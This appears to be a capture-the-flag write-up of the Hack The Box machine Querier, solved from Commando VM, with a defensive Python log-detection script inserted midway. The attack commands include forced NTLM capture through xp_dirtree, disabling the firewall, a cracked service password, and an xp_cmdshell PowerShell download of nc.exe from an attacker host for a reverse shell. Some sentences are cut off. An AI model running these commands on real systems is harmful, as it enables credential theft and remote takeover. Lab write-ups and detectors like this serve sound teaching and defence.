Hey guys, this is the second post for Querier; you can read the first post here. In the first post I solved it with Kali, in this post I will solve it with Commando VM. Querier's IP is 10.10.10.125 and I added it to my hosts file as querier.htb. Let's jump right in!
As always we will start with nmap to scan for open ports and services:

nmap -sV -sT -sC querier.htb
mssql server on port 1433. We don't have credentials for mssql so let's check
We need to list the shares; we can do that using net view:

net view querier.htb
It only showed us Reports because it is the only share we can access anonymously, which is nice.
We can mount the share with net use:

net use Z: \\querier.htb\Reports /persistent:yes
We can also do it from the file explorer:
olevba to get credentials from the Excel file like I did in the first post:
To connect to the mssql server I will use HeidiSQL:
However, authentication failed.
I tried Windows authentication:
But it also failed because it was trying as guest, not reporting.
To solve this we can use runas to run Heidi as reporting:

runas /netonly /user:QUERIER\reporting cmd.exe

From the new cmd session I ran
Now Windows authentication worked:
Got permission denied for
We can run a fake smb server to capture credentials using a tool called Inveigh, which works like responder. From powershell I imported the module (Import-Module C:\Tools\Inveigh\Inveigh.ps1). Then I disabled the firewall (netsh advfirewall set allprofiles state off) and invoked it (Invoke-Inveigh -IP 10.10.xx.xx -ConsoleOutput Y).
From Heidi I used:

EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'

Inveigh captured the NTLMv2 hash for
After cracking the hash on another box the password is corporate568. Now we can use runas to run HeidiSQL as mssql-svc:

runas /netonly /user:QUERIER\mssql-svc "C:\Program Files\HeidiSQL\heidisql.exe"
Queries to enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
Great, we got RCE. I ran a python server to host nc.exe, then I downloaded it on the box and got a reverse shell:

EXEC xp_cmdshell 'powershell Invoke-WebRequest -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.xx.xx/nc.exe';
We owned user.
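From the defender's side, the two SQL Server steps above (xp_dirtree pointed at an outside UNC path to force the service account to authenticate, then sp_configure enabling xp_cmdshell) are both visible in statement-level logging. The following is an added example, not code from the original write-up, that scans constructed sample records of the form "time|login|statement" (this layout, the trusted networks and the host names are assumptions, not real SQL Server audit output) and labels the suspicious statements.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample records, one statement per line: "<time>|<login>|<sql statement>".
# Not real SQL Server audit output; the field layout and values are assumptions.
SAMPLE_LOG = """\
2019-03-10T10:01:02|QUERIER\\reporting|SELECT name FROM sys.databases
2019-03-10T10:02:15|QUERIER\\reporting|EXEC MASTER.sys.xp_dirtree '\\\\10.10.14.3\\fakeshare'
2019-03-10T10:03:40|QUERIER\\reporting|EXEC master..xp_dirtree '\\\\fileserver.querier.htb\\Reports'
2019-03-10T10:05:01|QUERIER\\mssql-svc|EXEC sp_configure 'show advanced options', 1;
2019-03-10T10:05:02|QUERIER\\mssql-svc|EXEC sp_configure 'xp_cmdshell', 1;
2019-03-10T10:05:30|QUERIER\\mssql-svc|EXEC xp_cmdshell 'whoami'
"""

# Assumed allowlist: UNC targets on these networks/hosts are expected file servers.
TRUSTED_NETS = [ip_network("10.10.10.0/24")]
TRUSTED_HOSTS = {"fileserver.querier.htb"}

# Procedures that make the SQL Server service account open an SMB connection.
UNC_PROC = re.compile(r"xp_(?:dirtree|fileexist|subdirs)\s*'\\\\([^\\']+)", re.I)
ENABLE_CMDSHELL = re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)
CMDSHELL_EXEC = re.compile(r"\bxp_cmdshell\b", re.I)

def host_is_trusted(host):
    """IP literals are checked against TRUSTED_NETS, names against TRUSTED_HOSTS."""
    try:
        return any(ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:
        return host.lower() in TRUSTED_HOSTS

def classify(statement):
    """Return an alert label for one statement, or None if it looks benign."""
    m = UNC_PROC.search(statement)
    if m and not host_is_trusted(m.group(1)):
        # Service account would send NTLM authentication to a host we do not own.
        return "unc_to_untrusted_host"
    if ENABLE_CMDSHELL.search(statement):   # must be tested before the generic match
        return "xp_cmdshell_enabled"
    if CMDSHELL_EXEC.search(statement):
        return "xp_cmdshell_exec"
    return None

def scan(log_text):
    """Return (time, login, label) for every statement that raised an alert."""
    alerts = []
    for line in log_text.splitlines():
        ts, login, stmt = line.split("|", 2)
        label = classify(stmt)
        if label:
            alerts.append((ts, login, label))
    return alerts

if __name__ == "__main__":
    for ts, login, label in scan(SAMPLE_LOG):
        print(ts, login, label)
```

The "unc_to_untrusted_host" rule is the one that catches the hash capture step; an xp_dirtree against a known internal file server is left alone.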
As I said in the first post, when I checked group policy passwords I found Administrator's password. There are privilege escalation enumeration scripts for Windows, like LinEnum.sh for Linux; one of them is PowerUp.ps1, and it checks for group policy passwords. Let's check that one:
It also decrypts the password, which is nice. Password:
Now we can use psexec to get a shell as Administrator. I used runas to start cmd.exe as QUERIER\Administrator, then I used psexec:

runas /netonly /user:QUERIER\Administrator cmd.exe

psexec \\querier.htb cmd
And we owned root!
That's it, feedback is appreciated!
Don't forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter @Ahm3d_H3sham.
Thanks for reading.